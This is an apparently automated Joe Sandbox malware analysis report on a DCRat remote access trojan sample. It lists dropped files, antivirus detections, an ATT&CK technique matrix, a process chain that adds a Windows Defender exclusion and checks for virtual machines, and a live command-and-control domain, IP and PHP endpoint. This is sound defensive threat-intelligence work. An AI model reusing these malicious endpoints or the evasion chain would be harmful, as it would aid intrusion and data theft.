                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts141
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    12
                                    Process Injection
                                    122
                                    Masquerading
                                    OS Credential Dumping1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter
                                    1
                                    DLL Side-Loading
                                    1
                                    DLL Side-Loading
                                    11
                                    Disable or Modify Tools
                                    LSASS Memory351
                                    Security Software Discovery
                                    Remote Desktop ProtocolData from Removable Media2
                                    Non-Application Layer Protocol
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Exploitation for Client Execution
                                    Logon Script (Windows)Logon Script (Windows)251
                                    Virtualization/Sandbox Evasion
                                    Security Account Manager2
                                    Process Discovery
                                    SMB/Windows Admin SharesData from Network Shared Drive12
                                    Application Layer Protocol
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                    Process Injection
                                    NTDS251
                                    Virtualization/Sandbox Evasion
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information
                                    LSA Secrets1
                                    Application Window Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                                    Obfuscated Files or Information
                                    Cached Domain Credentials2
                                    File and Directory Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                    Software Packing
                                    DCSync157
                                    System Information Discovery
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading
                                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631230 Sample: Ccp3sJPDXs.exe Startdate: 06/03/2025 Architecture: WINDOWS Score: 100 77 asdff123fsdafasdf.ru 2->77 81 Suricata IDS alerts for network traffic 2->81 83 Antivirus detection for URL or domain 2->83 85 Antivirus detection for dropped file 2->85 87 8 other signatures 2->87 11 Ccp3sJPDXs.exe 3 6 2->11         started        signatures3 process4 file5 73 C:\SavesHost\Blockbrowser.exe, PE32 11->73 dropped 75 C:\SavesHost\6kXFj.vbe, data 11->75 dropped 14 wscript.exe 1 11->14         started        process6 signatures7 107 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->107 109 Suspicious execution chain found 14->109 17 cmd.exe 1 14->17         started        19 conhost.exe 14->19         started        process8 process9 21 Blockbrowser.exe 3 34 17->21         started        25 conhost.exe 17->25         started        file10 57 C:\Users\user\ZI0Zcb1pDT.exe, PE32 21->57 dropped 59 C:\Users\user\Desktop\xJfQbpmT.log, PE32 21->59 dropped 61 C:\Users\user\Desktop\wdLbULQa.log, PE32 21->61 dropped 63 20 other malicious files 21->63 dropped 89 Antivirus detection for dropped file 21->89 91 Multi AV Scanner detection for dropped file 21->91 93 Drops PE files to the user root directory 21->93 95 Adds a directory exclusion to Windows Defender 21->95 27 cmd.exe 21->27         started        29 powershell.exe 23 21->29         started        32 powershell.exe 23 21->32         started        34 4 other processes 21->34 signatures11 process12 signatures13 36 8Kh5jgTdnc69SVsXvfN.exe 27->36         started        41 conhost.exe 27->41         started        55 2 other processes 27->55 105 Loading BitLocker PowerShell Module 29->105 43 conhost.exe 29->43         started        45 WmiPrvSE.exe 29->45         started        47 conhost.exe 32->47         started        49 conhost.exe 34->49         started        51 conhost.exe 34->51         started        53 conhost.exe 34->53         started        process14 dnsIp15 79 asdff123fsdafasdf.ru 188.114.96.3, 49753, 49759, 49760 CLOUDFLARENETUS European Union 36->79 65 C:\Users\user\Desktop\ziDjmQZr.log, PE32 36->65 dropped 67 C:\Users\user\Desktop\unCSekjx.log, PE32 36->67 dropped 69 C:\Users\user\Desktop\slPjJBeC.log, PE32 36->69 dropped 71 14 other malicious files 36->71 dropped 97 Antivirus detection for dropped file 36->97 99 Multi AV Scanner detection for dropped file 36->99 101 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 36->101 103 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->103 file16 signatures17

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    Ccp3sJPDXs.exe76%VirustotalBrowse
                                    Ccp3sJPDXs.exe68%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    SourceDetectionScannerLabelLink
                                    C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\SnwWbCTA.log100%AviraHEUR/AGEN.1300079
                                    C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\Public\Documents\0ZuAkTjxKX.exe100%AviraHEUR/AGEN.1339906
                                    C:\SavesHost\6kXFj.vbe100%AviraVBS/Runner.VPA
                                    C:\SavesHost\SgrmBroker.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\JRXzWseY.log100%AviraTR/Agent.egqpz
                                    C:\Users\user\Desktop\Opngnglp.log100%AviraTR/Agent.jbwuj
                                    C:\Users\user\AppData\Local\Temp\equVSDMYPr.bat100%AviraBAT/Delbat.C
                                    C:\SavesHost\Blockbrowser.exe100%AviraHEUR/AGEN.1339906
                                    C:\Users\user\Desktop\NzeXyGEM.log100%AviraHEUR/AGEN.1362695
                                    C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\SavesHost\Blockbrowser.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\SavesHost\SgrmBroker.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Public\Documents\0ZuAkTjxKX.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\IxKHLBgB.log9%ReversingLabs
                                    C:\Users\user\Desktop\JRXzWseY.log25%ReversingLabs
                                    C:\Users\user\Desktop\JulPgBvw.log17%ReversingLabs
                                    C:\Users\user\Desktop\KxrpdWzR.log12%ReversingLabs
                                    C:\Users\user\Desktop\LipXSOru.log12%ReversingLabs
                                    C:\Users\user\Desktop\NzeXyGEM.log17%ReversingLabs
                                    C:\Users\user\Desktop\Opngnglp.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\OvRyOCaQ.log21%ReversingLabs
                                    C:\Users\user\Desktop\OwFfUGTH.log17%ReversingLabs
                                    C:\Users\user\Desktop\SnwWbCTA.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\TcFfQdBd.log29%ReversingLabs
                                    C:\Users\user\Desktop\UQJnCrwb.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\UgLFMzEy.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\XnIOiRzu.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\YYGwXJrX.log17%ReversingLabs
                                    C:\Users\user\Desktop\ZEamenMP.log25%ReversingLabs
                                    C:\Users\user\Desktop\apvwEADp.log29%ReversingLabs
                                    C:\Users\user\Desktop\bGNUAWQL.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\bVPmLfYi.log8%ReversingLabs
                                    C:\Users\user\Desktop\bdzEpOzn.log8%ReversingLabs
                                    C:\Users\user\Desktop\eOeVwbKg.log25%ReversingLabs
                                    C:\Users\user\Desktop\ezcDmTCJ.log25%ReversingLabs
                                    C:\Users\user\Desktop\hHZMHlwF.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\lgJkAMCv.log21%ReversingLabs
                                    C:\Users\user\Desktop\lpgkkzWs.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\lxQDOiwy.log8%ReversingLabs
                                    C:\Users\user\Desktop\ouZtCEeJ.log17%ReversingLabs
                                    C:\Users\user\Desktop\sCWCXWYE.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\slPjJBeC.log34%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\uaYsybMf.log34%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\unCSekjx.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\wdLbULQa.log8%ReversingLabs
                                    C:\Users\user\Desktop\xJfQbpmT.log17%ReversingLabs
                                    C:\Users\user\Desktop\ziDjmQZr.log9%ReversingLabs
                                    C:\Users\user\ZI0Zcb1pDT.exe74%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    http://asdff123fsdafasdf.ru/0%Avira URL Cloudsafe
                                    http://asdff123fsdafasdf.ruS0%Avira URL Cloudsafe
                                    https://goAppVClientCmdlets.psm10%Avira URL Cloudsafe
                                    http://wsoft.coms/CPS/dem00%Avira URL Cloudsafe
                                    http://asdff123fsdafasdf.ru0%Avira URL Cloudsafe
                                    http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.php100%Avira URL Cloudmalware
                                    http://www.microsoft.co0%Avira URL Cloudsafe
                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    bg.microsoft.map.fastly.net
                                    199.232.210.172
                                    truefalse
                                      high
                                      asdff123fsdafasdf.ru
                                      188.114.96.3
                                      truetrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        http://asdff123fsdafasdf.ru/packetLowGeoProtectCentral.phptrue
                                        • Avira URL Cloud: malware
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.micpowershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://asdff123fsdafasdf.ruS8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000008.00000002.2432329134.000001A498608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB4038000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE2D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932E48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.3164480126.000001A4A8454000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2576914126.0000019EC3E85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3172837605.00000282BE124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.3114516245.000001C490075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.microsoft.copowershell.exe, 0000000D.00000002.3353868010.000001994AE60000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://contoso.com/Licensepowershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://goAppVClientCmdlets.psm1powershell.exe, 00000009.00000002.2690185459.0000019ECC217000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://crl.micpowershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000011.00000002.3150761843.0000021864275000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.micft.cMicRosofpowershell.exe, 00000009.00000002.2702128870.0000019ECC297000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore68powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://wsoft.coms/CPS/dem0powershell.exe, 00000008.00000002.3380978390.000001A4B0AE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBlockbrowser.exe, 00000005.00000002.2307367187.0000000003117000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2432329134.000001A4983E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2370874697.0000019EB3E11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2433427298.00000282AE0B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2441786339.0000019932C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2418611372.000001C480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2442562160.0000021854201000.00000004.00000800.00020000.00000000.sdmp, 8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://asdff123fsdafasdf.ru/8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2442562160.0000021854429000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://asdff123fsdafasdf.ru8Kh5jgTdnc69SVsXvfN.exe, 00000019.00000002.3493949668.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.microspowershell.exe, 00000009.00000002.2702128870.0000019ECC2D2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        188.114.96.3
                                                                        asdff123fsdafasdf.ruEuropean Union
                                                                        13335CLOUDFLARENETUStrue
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1631230
                                                                        Start date and time:2025-03-06 20:20:28 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 11m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:28
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Ccp3sJPDXs.exe
                                                                        renamed because original name is a hash value
                                                                        Original Sample Name:3e27b10ac7aa4c46437a300fb3ea5bdf.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.expl.evad.winEXE@37/77@1/1
                                                                        EGA Information:
                                                                        • Successful, ratio: 22.2%
                                                                        HCA Information:Failed
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                        • Excluded IPs from analysis (whitelisted): 40.126.31.2, 40.126.31.131, 20.190.159.4, 20.190.159.129, 40.126.31.129, 40.126.31.3, 40.126.31.0, 20.190.159.130, 2.23.77.188, 13.107.246.60, 4.175.87.197
                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e3913.cd.akamaiedge.net, www.tm.lg.prod.aadmsa.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, cac-ocsp.digicert.com.edgekey.net, ocsp.digicert.com, login.live.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.edge.digicert.com, wu-b-net.trafficmanager.net
                                                                        • Execution Graph export aborted for target 8Kh5jgTdnc69SVsXvfN.exe, PID 7940 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 1988 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 3376 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 4816 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5260 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 5472 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6208 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        TimeTypeDescription
                                                                        14:21:46API Interceptor190x Sleep call for process: powershell.exe modified
                                                                        14:21:57API Interceptor1235639x Sleep call for process: 8Kh5jgTdnc69SVsXvfN.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        188.114.96.3justificante de transferencia09454545.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • www.kdjsswzx.club/myab/?MP=NdxOYJDJG4lm+JEaKG3C3Lbnwt5J/jX7V01w+cJuJBraytzWaHOc0QEGm1yXIwrAoNttsMOQwUptf8Glw1EAh4LN1ggO1axYIhZB7gb+MpY69764OA==&vv=hBodit
                                                                        Shipping Document.exeGet hashmaliciousFormBookBrowse
                                                                        • www.fkrvhaupjtc.info/2p9f/
                                                                        RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                                                                        • www.timeinsardinia.info/50g8/
                                                                        https://regcompany.marrkone.com/ssddcw/e095cdfe/?aef2d=cmFsaUBiYW5lc2NvdXNhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                        • login.marrkone.com/4c8979e070?nxx=dccfc2c7eecccfc0cbddcdc1dbddcf80cdc1c3accdcf
                                                                        FRQ 101102-04-25-0948-015.exeGet hashmaliciousFormBookBrowse
                                                                        • www.tether1.xyz/focp/
                                                                        http://uploads-ssl.webflow.com/660018002a32edee7a11d41b/66335b965a5a96f03bd82400_kasuwidavogog.pdfGet hashmaliciousUnknownBrowse
                                                                        • melurilexuki.urseghy.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=91706aaa4ac64204
                                                                        http://netflix-official.com/e/authID=ek3LfGet hashmaliciousUnknownBrowse
                                                                        • netflix-official.com/e/img/nficon2016.ico
                                                                        PAYMENT SWIFT COPY.exeGet hashmaliciousFormBookBrowse
                                                                        • www.fkrvhaupjtc.info/2p9f/
                                                                        laser (2).ps1Get hashmaliciousFormBookBrowse
                                                                        • www.nmw365.xyz/d3qr/
                                                                        ZmK1CAc4VP.exeGet hashmaliciousFormBookBrowse
                                                                        • www.adventurerepair24.live/qr1m/
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        bg.microsoft.map.fastly.netMasonRootkit.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        MITRE Enterprise ATTACK v16.1.xlsxGet hashmaliciousMimikatzBrowse
                                                                        • 199.232.210.172
                                                                        OPENBASE ATT09918_ 6TH_MARCH_2025 _.PDFGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        05 BOIRON F 240700457 ORDEN 05 MAR 2025.xlsGet hashmaliciousHidden Macro 4.0Browse
                                                                        • 199.232.210.172
                                                                        05 BOIRON F 240700457 ORDEN 05 MAR 2025.xlsGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        payload1dec.bin.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        Quote 09052022-008_1.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        PROFORMA INVOICE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 199.232.214.172
                                                                        Quote 09052022-008_1.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 199.232.210.172
                                                                        file.0xd10e5bd05bb0.0xd10e58feb750.DataSectionObject.CV.docm.docmGet hashmaliciousUnknownBrowse
                                                                        • 199.232.214.172
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUShttps://themortgagehub.netlify.app/Get hashmaliciousUnknownBrowse
                                                                        • 104.17.24.14
                                                                        https://www.octopuspro.xyz/Get hashmaliciousUnknownBrowse
                                                                        • 104.21.84.46
                                                                        voice-recording-DBWONKGPCK-08-03-2025.htmGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.17.24.14
                                                                        https://sfo2.digitaloceanspaces.com/mo8043/jm1208Get hashmaliciousUnknownBrowse
                                                                        • 104.21.43.178
                                                                        3vnPlay__(Mimi.merhi)__Now_AUD__autoresponse_}.svgGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.18.95.41
                                                                        http://tdi6.rianicefe.comGet hashmaliciousUnknownBrowse
                                                                        • 104.21.59.249
                                                                        Repeat Order.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                        • 104.21.16.1
                                                                        https://krlbnwrvjizgauhuaegf.supabase.co/storage/v1/object/public/enroute-computer/Enroute%20Computer%20Solutions.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                        • 172.64.149.246
                                                                        cARM.elfGet hashmaliciousUnknownBrowse
                                                                        • 172.67.19.24
                                                                        3vnPlay__(Harrison.edwards)__Now_AUD__autoresponse_}.svgGet hashmaliciousHTMLPhisherBrowse
                                                                        • 104.16.123.96
                                                                        No context
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        C:\Users\user\Desktop\IxKHLBgB.log5b5HHFJ4F5.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          8Y979B6CVq.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            2uURPptBmx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              Edk2E555BO.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                XkggQZnZYs.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                  63f29472e773f209f956ac819b94f41dae4fd3f0ed85d.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                    3Lw8TDhz3z.exeGet hashmaliciousHackBrowser, DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, Xmrig, zgRATBrowse
                                                                                      Lj4nhC1de2.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                        J4eBFnLmWF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                          xkh7Uu17jK.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            Process:C:\SavesHost\Blockbrowser.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):109
                                                                                            Entropy (8bit):5.546546567932234
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:hWQwT076OT2hBAoDEXerVowtGakHSD9CnpJBk:hlx7lCxCY3D9CnpJBk
                                                                                            MD5:F2403A5501B330406FD15F32AEDDED0F
                                                                                            SHA1:F0F0B796BBE404BC84C47610B0759F04D38D38A5
                                                                                            SHA-256:CA01B58C19848A143EF3F1AAE4ADC208E327F715B41E9F2BAA3E35525A1E697F
                                                                                            SHA-512:E3D111C4BF8E577AD6A769DD9E7A80C19455DE09EC79FA303AEC6F466CD32D3956A4BCDBA548B05DDDC7844A6B1B7B6DE1846A23CB775560CFA93B80FBD07A13
                                                                                            Malicious:false
